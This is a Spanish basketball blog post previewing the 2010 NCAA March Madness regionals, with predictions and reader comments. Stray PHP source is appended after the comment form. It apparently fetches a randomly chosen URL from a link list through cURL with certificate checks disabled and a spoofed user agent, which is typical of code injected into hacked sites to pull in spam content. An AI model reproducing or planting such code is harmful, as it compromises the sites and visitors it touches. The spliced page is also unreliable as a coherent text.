March Madness 2010

18 de March de 2010 por kantonyo

Después de la temporada regular y los campeonatos de conferencia, los 65 equipos clasificados entran en liza en una de las competiciones deportivas más apasionantes del año. Como ha ocurrido en las últimas temporadas todos los partidos se podrán ver totalmente gratis y con una gran calidad de imagen a través de la web http://mmod.ncaa.com/ tanto en directo como en diferido. A continuación  analizamos las cuatro divisiones en las que están organizadas las eliminatorias a único partido, los cuatro ganadores disputaran la Final Four los días 3 y 5 de Abril en Indianápolis.

East Regional

La Universidad de Kentucky parte como clara favorita para llegar a la Final Four desde esta división. En su primera eliminatoria, los Wildcats tendrán en frente a East Tennessee State, campeones de la modesta conferencia Atlantic-Sun. John Wall y DeMarcus Cousins no deben tener ningún problema para pasar a la segunda ronda, donde se enfrentaran al ganador del encuentro entre Wake Forest y Texas. Estos dos equipos han estado muy por debajo de sus expectativas durante la temporada regular. A priori, los Longhorns de Texas disponen de un equipo más potente con una buena pareja de interiores formada por Damion James y Dexter Pittman, pero si en algo han destacado los Demon Deacons estos últimos años es en su capacidad de romper los pronósticos. Habrá que seguir de cerca al alero Al-Farouq Aminu, posible top 10 del próximo draft que dispone de unas cualidades físicas únicas.

En Jacksonville se disputaran otras dos eliminatorias. Wisconsin lo tendrá fácil ante Wofford, a pesar de la racha de 13 victorias seguidas que han conseguido los de South Carolina. Los Badgers han recuperado a su mejor jugador, el ala-pívot Jon Leuer que se perdió la mitad de la temporada por lesión. En el otro encuentro, los Big Red de Cornell, campeones de la elitista Ivy League, intentaran ponérselo difícil a  la Universidad de Temple, que ha dominado claramente su conferencia llevándose el título de la Atlantic 10. Por lo tanto, salvo sorpresa, Temple y Wisconsin se enfrentaran en segunda ronda en una eliminatoria muy igualada.

En la otra zona del cuadro, West Virginia, flamante campeona de la difícil Conferencia Big East, no deberá tener complicaciones contra Morgan State. El potente trío interior, formado por DaSean Butler, Kevin Jones y Devin Ebanks, está capacitado para luchar por un hueco en la Final Four. En segunda ronda se verá las caras contra el ganador del partido que enfrenta a Clemson contra Missouri. Estos dos equipos no llegan en un buen momento al torneo, y por lo tanto, no deberían ser rival para los Mountaineers de West Virginia.

Por último, los Lobos de New Mexico tienen la obligación de deshacerse fácilmente de Montana, ya que en este momento se sitúan como octavos en el AP TOP a pesar de no ganar su conferencia, la débil Mountain West. Aunque consigan clasificarse no lo tendrán fácil ante el ganador de la otra eliminatoria entre Marquette y Washington. Los Huskies, son junto California, las únicas universidades de la Conferencia Pac-10 clasificadas para el March Madness. El base Isaiah Thomas y el potente alero Quincy Pondexter pueden dar la sorpresa ante Marquette y no es descartable que lleguen a las semifinales de la región.

Pronóstico:

Semifinales regionales: Kentucky vs Wisconsin, West Virginia vs Washington
Clasificado para la Final Four: Kentucky

South Regional

La Universidad de Duke ha llegado al March Madness con ganas de olvidar la temporada 2008-09 donde su eterno rival, North Carolina, se proclamó campeón de la NCAA. Este año todo ha cambiado, mientras UNC se quedaba fuera del torneo, Duke llega con bastantes posibilidades de llegar a la Final Four. Hace unos días se convirtieron en campeones de la Conferencia ACC con autoridad gracias a la pareja de rubios Jon Scheyer y Kyle Singler. No deberán tener problemas para pasar las dos primeras rondas contra la modesta Arkansas-Pine Bluff y contra el ganador de California-Louisville. Los Cardinals de Louisville no están siendo el equipo regular del año pasado, tras la marcha a la NBA de Earl Clark y Terrence Williams, y han estado a punto de verse fuera del torneo. El potente ala-pívot Samardo Samuels será su mejor baza para frenar a California, donde la pareja de guards, Patrick Christopher y Jerome Randle llevaran la batuta del equipo de Barkeley.

La grave lesión de Robbie Hummel en su mejor momento de la temporada será el mayor hándicap que tendrá que superar los Boilermakers de Purdue en su inicio en el torneo. A pesar de esta ausencia, el pívot JaJuan Johnson y el escolta ETwaun Moore deben llevar a su universidad a las semifinales regionales como mínimo. En su primer partido tendrán en frente a los campeones de la conferencia MAAC, la Universidad de Siena. Los Saints han vuelto a arrasar en su torneo, pero hace unas semanas cayeron por paliza contra Butler en su único enfrentamiento de prestigio de los últimos meses. Texas A&M, semifinalista de la Conferencia Big 12, parte como favorito en su enfrentamiento contra Utah State. El base Donald Sloan ha tenido un buen final de temporada regular y será el referente de los Aggies. Utah State intentará reponerse del fracaso de perder la final de la Conferencia WAC contra New Mexico.

Los segundos cabezas de serie de esta división son los Wildcats de Villanova. A pesar de que el año pasado llegaron a la Final Four y que hace un mes estaban en los puestos altos del ranking AP, Villanova ofrece muchas dudas. Las últimas semanas han tenido un nivel muy bajo, perdiendo incluso en primera ronda del torneo Big East contra Marquette. A pesar de ello, el sorteo ha sido muy favorable. En primera ronda se verán las caras contra la débil Robert Morris y más tarde deberán enfrentarse contra Richmond o Saint Mary’s. En este último partido habrá que fijarse sin duda, en el pívot Omar Samhan, que promedia 21 puntos y 11 rebotes.

En la última parte del cuadro de la South Regional destaca la Universidad de Baylor. El escolta LaceDarius Dunn y el pívot Ekpe Udoh tendrán una eliminatoria fácil contra Sam Houston State y después medirán fuerzas probablemente contra los Irlandeses de Notre Dame. Luke Harangody, recién salido de una lesión, será la gran atracción de los Irish. El ala-pívot ha vuelto a tener este año unos números de escándalo, con 22 puntos y 9 rebotes. Será su gran oportunidad para avanzar unos puestos en el próximo draft. En la primera eliminatoria tendrán un enfrentamiento cómodo contra Old Dominion.

Pronóstico:

Semifinales regionales: Duke vs Purdue, Villanova vs Baylor
Clasificado para la Final Four: Duke

MidWest Regional


El sorteo ha querido que la MidWest Regional sea la división más potente de este año. A pesar de ello, los máximos favoritos al título según las apuestas, los Jayhawks de Kansas, tendrán un comienzo sencillo ante Lehigh y el ganador de UNLV contra Northern Iowa. Lo difícil vendrá después cuando por el camino se deberá ver las caras contra Michigan State o Maryland. Michigan State, subcampeón del año pasado, ha tenido un final de temporada muy por debajo de sus aspiraciones donde fueron eliminados en primera ronda del torneo BigTen. Por su parte, el venezolano Greivis Vasquez, uno de los mejores bases del año ha conseguido llevar a los Terrapins al subcampeonato de la regular-season en la Conferencia ACC. A pesar de ser 13º cabeza de serie, Houston no será una presa fácil para Maryland, como ya pudo comprobar UTEP en la final de la Conferencia USA.

Ohio State y su estrella Evan Turner llegan al torneo final en su mejor momento después de un inicio de temporada titubeante. Han sido campeones de la complicada BigTen, ganando de 30 puntos en la final y tienen una de las plantillas más completas y profundas. Su primer partido contra Santa Barbara será un puro trámite y no podremos medir su verdadero potencial hasta segunda ronda contra el ganador de la eliminatoria entre Oklahoma State y Georgia Tech. En los Cowboys de Oklahoma State se encuentra otro de los mejores guards de la competición, James Anderson. El escolta de tercer año, que será elegido en primera ronda del draft, ha promediado 23 puntos y 6 rebotes. A pesar de una mala temporada regular, Georgia Tech consiguió llegar a la final de la ACC con una gran actuación del freshman Derrick Favors, candidato a top 5 en el draft 2010.

Si hay algún equipo del que se puede esperar lo mejor y lo peor, este es la Universidad de Georgetown. Los Hoyas después de quedar en el puesto 7º de la BigEast en la regular-season, consiguieron llegar a la final del torneo de conferencia donde perdió contra West Virginia. Greg Monroe, estrella del instituto, parece que por fin ha conseguido llegar al nivel que prometía. Después de una fácil eliminatoria contra Ohio  se verán en la siguiente ronda probablemente contra Tennessee. Los Volunteers han sido el matagigantes de la competición durante la temporada regular, ganando a Kansas y Kentucky, por lo que a pesar de que no dispongan de una gran plantilla, habrá que tenerlos en cuenta.

Pronóstico:

Semifinales regionales: Kansas vs Michigan State, Ohio State vs Georgetown
Clasificado para la Final Four: Kansas

West Regional

Los Orange de Syracuse, campeones del año 2003 con Carmelo Anthony, han vuelto a la elite de la NCAA gracias a la adquisición de Wesley Johnson desde Iowa State. Wes ha sido el gran tapado del año después de perderse la temporada pasada por problemas legales. En este momento opta a ser elegido en el top10 del draft. Syracuse tendrá ante Vermont un sencillo cruce donde intentará volver a coger confianza tras las dos derrotas consecutivas ante Louisville y Georgetown. Si no hay sorpresas, se enfrentará ante el ganador de Gonzaga-Florida State. Los Seminoles de Florida State cuentan con uno de los mejores pívots de esta temporada, Solomon Alabi. Con 21 años, el nigeriano recuerda a Samuel Dalembert por sus condiciones físicas. En frente, los Bulldogs de Gonzsaga, llegan al torneo después de dejarse sorprender en su conferencia ante Saint Mary’s en una contundente derrota. El escolta Matt Bouldin es su jugador más carismático, pero recomendamos seguir de cerca al joven alero Elias Harris. El pívot de Gonzaga, Robert Sacre, será clave en su enfrentamiento contra Alabi para llevar a su equipo a segunda ronda.

La Universidad de Butler, es el único equipo que ha conseguido un pleno de victorias en su conferencia. Tras 20 victorias consecutivas llegan al March Madness como 8º en el ranking AP. Su máxima figura es el alero Gordon Hayward, con un estilo de juego que recuerda a Mike Dunleavy Jr. La Universidad de Texas El Paso (UTEP) será su rival en primera ronda. Los Mineros se han convertido por primera vez en campeones de la liga regular de la Conferencia USA con gran autoridad, pero se vieron sorprendidos por Houston en la final del torneo. El vencedor de este partido se enfrentará probablemente a los Commodores de Vanderbilt. Los de Nashville, comandados por el pívot australiano AJ Ogilvy, no deberán tener problemas ante Murray State.

La pareja de guards, Jacob Pullen y Denis Clemente, han conseguido llevar a Kansas State a su mejor nivel de los últimos veinte años. Subcampeones de la Big 12 a la sombra de Kansas Jayhawks, los Wildcats se han colocado como séptimos en el AP Top. Después de una primera ronda cómoda ante North Texas, se verán contra el ganador de BYU-Florida. A pesar de los malos resultados, los Florida Gators disponen de una potente y completa plantilla. En el perímetro exterior cuentan con los guards Kenny Boynton y Erving Walker y en el poste un potente trío de aleros donde destaca Chandler Parsons. Brigham Young intentará pasar de segunda ronda por primera vez en 17 años gracias su estrella, el base Jimmer Fredette.

A pesar de las bajas de Sam Young y DeJuan Blair, los Panthers han conseguido realizar una temporada aceptable llegando al puesto 18 del ranking AP y consiguiendo ser tercera cabeza de serie de la West Regional. El pívot Keith Benson de Oakland será el principal problema que tenga Pitt en primera ronda en una eliminatoria a priori poco complicada. En el otro enfrentamiento habrá muchísima más igualdad entre Xavier y Minnesota. Los Golden Gophers de Minnesota han llegado al torneo con bastante polémica, ya que muchos considerábamos a Mississippi State con más meritos. En frente tendrán un duro escollo en la Universidad de Xavier guiada por el escolta Jordan Crawford.

Pronóstico:

Semifinales regionales: Syracuse vs Butler, Pittsburgh vs Kansas State
Clasificado para la Final Four: Syracuse

Comenta

9 comentarios a esta entrada

  1. Txusma dice:
    #1

    Brutal análisis, imágenes incluídas!
    La NCAA en sí me parece un tanto aburrida pq los jugadores y los equipos parecen tener menos conceptos y fundamentos que los de la NBA pero la March Madness me parece un momento brutal. 4 partidos sin posibilidad de fallo para llegar a la Final Four, con otros 2 partidos con el cuchillo entre los dientes. Emocionantísimo. No me extraña que arrastre lo que arrastra en USA.

      Citar

  2. sergio dice:
    #2

    Me quito el sombrero Kantonyo.. increible reportaje. Me tendre que imprimir el articulo para decidir partidos para ver jajaj

    Lo que veo es que no apuestas por ninguna sorpresa en la Final Four. Los 4º primeros de cada regional los metes en la finalisima. Dime sinceramente quien es para ti el maximo favorito a dar la sorpresa, porque no olvidemos que son rondas a un partido y a un partido puede perder cualquiera.

    Este formato de competicion es apasionante y lo unico que historicamente me ha llamado la atencion de la NCAA (prometo aficionarme mas gracias a Kantonyo). A pesar de que tambien pueda ser injusto en algun momento con los favoritos, esas sorpresas son las que deben marcar las competiciones menores desde mi punto de vista. Asi se potencia la regularidad e infalibilidad de los jugadores estrella de cada equipo, destinados a marcar las diferencias en las eliminatorias, tanto ahora como en su hipotetica inclusion en la NBA.

    Ademas, realizarla justo antes de los Playoffs de la NBA tiene muchas buenas repercusiones para la liga mayor: despierta las ganas de los aficionados ante la mejor parte de la temporada, evita bajones de seguimiento en ciudades donde en las que sus equipos no tienen posibilidades de mejorar sus posiciones de cara al tramo final de la NBA, permite a los ojeadores de las franquicias de cola hacer “scouts” a las principales estrellas ahora que se ha terminado la posibilidad de traspasos…. en fin, todo muy bien pensado.

      Citar

  3. kantonyo dice:
    #3

    Sergio, la verdad que yo he pensado lo mismo cuando he visto el pronóstico, he sido muy amarrategui, seguro que fallo alguno, porque nunca llegan los cuatro cabezas de serie a la final-four.

    De los cuatro creo que Syracuse es el más flojo pero ha tenido suerte con los emparejamientos. He estado a punto de jugarmela con Butler, creo que podría dar la sorpresa y llegar muy lejos.

    Otras posibles sorpresas, para mí pueden ser Florida, Washington o Texas.

      Citar

  4. sergi237 dice:
    #4

    saludos¡

    soy nuevo por aqui y al fin me decidido a comentar ya que este me parece uno de los mejores blogs para hablar de la NBA con otra gente,espectacular analisis y el aporte de la web tambien se agradece

    PD:Si wall es una quinta parte de lo bueno que se dice es una buena primera elecion del draft 😀

      Citar

  5. Txusma dice:
    #5

    Madre mía, vaya primer día de March Madness!!

    Ohio se cargó a GeorgeTown, así que Greg Monroe se va a la calle.
    Murray venció a Vanderbilt (No veremos más a Ogilvy)
    Washington se impuso a Marquette con beazer-beater de Pondexter (aquí ya avisó Kantonyo)
    Notre-Dame, Richmond, UNLV y Texas también fuera…

    Pero esto que es, Daimiel?!

      Citar

  6. kantonyo dice:
    #6

    Lo de Georgetown como ya avisamos es de circo, son capaces de todo, de lo mejor y de lo peor, y en especial Greg Monroe, estuvo horrible y muy precipitado con siete perdidas de balón ridiculas. Le va a hacer caer puestos en el draft.

    Harangody también estuvo desaparecido en su última oportunidad, no sabemos si por culpa de su lesión y peligra su selección en el draft. podría quedarse fuera.

    Villanova a pesar de su victoria dejó una mala imagen, y tendrá que verse las caras contra Saint Marys, que ayer ganó con la mejor actuación de la noche, la del pívot Omar Samhan con 29 puntos y 12 rebotes

    Kentucky es el único que ha podido ganar comodamente. A Baylor se le ponen la cosas de cara tras una buena primera eliminatoria y las sensaciones que han dejado en su cuadro del torneo, cuidado con ellos!!

    Por último me alegro del buen rendimiento de Aminú, le veia muy estancado este año, creo que va a ser un buen jugador en la NBA, tiene físico para ello.

    Por cierto Sergi237, bienvenido!!. Que mejor sitio el March Madness para ver el verdadero potencial de John Wall, ayer en un partido cómodo estuvo bastante correcto. Lo que me sorprende de este jugador es su solidaridad en el juego de su equipo, es muy inteligente sobre el campo.

      Citar

  7. kantonyo dice:
    #7

    En el primer partido de la segunda ronda, sorpreson!! Omar Samhan, pívot de Saint Mary´s se bastó el solito para ganar a Villanova, 32 puntos (13/16), 7 rebotes y 2 tapones. Además dejó al prometedor Yarou en 4 puntitos. Omar, en dos partidos 60 minutos, 61 puntos (24/32), 19 rebotes. A pesar de su físico, y su forma de correr, es un jugador muy rápido de movimientos en la zona, y buena mano en tiros de corta distancia. Está cerca de los 2,10 y tiene 21 años. No contaba para el draft, veremos si estas actuaciones hacen cambiar de opinión.

      Citar

  8. Love Denise dice:
    #8

    jo, vaya numeracos y % de este omar, en el mock draft de nbadraft ni viene entre los 60.

      Citar

  9. kantonyo dice:
    #9

    Si lo de Saint Marys’s ha sido sorpresa, no sé como catalogar la derrota de los grandes favoritos, Kansas Jayhawks (1) contra Norther Iowa Panthers(9). Lesión de Aldrich quedando 6 minutos, aunque en ese momento perdian de 10, asi que no hay excusas. Horrible partido de Xabier Henry y Sherron Collins. Los Panther no destacan por su talento, pero le han echado muchos huevos, en especial Jordan Eglseder que ha desquiciado a los Jayhawks!!!

    Tenneessee, Baylor y Butler no han fallado y ya están clasificados para el sweet sixteen junto con Saint Mary’s y Norther Iowa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>